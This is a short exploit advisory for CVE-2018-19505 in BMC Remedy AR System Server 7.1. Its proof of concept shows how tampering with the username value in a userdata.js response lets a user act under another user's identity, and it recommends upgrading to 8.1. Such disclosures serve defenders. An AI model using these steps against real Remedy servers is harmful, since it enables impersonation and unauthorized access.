BMC Remedy 7.1 User Impersonation

`<!--  
# Exploit Title: Impersonation may lead to incorrect user context in Remedy  
AR System Server in BMC Remedy 7.1  
# Date: 23-11-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.bmc.com/  
# Software Link: http://www.bmc.com/  
# Version: Impersonation may lead to incorrect user context in Remedy AR  
System Server in BMC Remedy 7.1  
# Tested on: all  
# CVE : 1CVE-2018-19505  
# Category: webapps  
  
1. Description  
  
Remedy AR System Server in BMC Remedy 7.1 may fail to set the correct user  
context in certain impersonation scenarios, which can allow a user to act  
with the identity of a different user.  
  
  
2. Proof of Concept  
  
Impersonation may lead to incorrect user context in Remedy AR System Server  
in BMC Remedy 7.1.  
  
Go to WorkOrderConsole:  
  
In Request:  
/WOI:WorkOrderConsole/Default+User+View+(Support)/userdata.js?winname=SERVERWOIWOI+WORKOrderConsole12345643244  
(last values can change)  
  
In response change the user value in function  
UserData_Init(){ARKWSetup(2,"USERNAME_TO_CHANGE","....more values).  
  
  
3. Solution:  
  
Update to the latests version Remedy AR System Server in BMC Remedy 8.1.  
  
-->  
  
  
`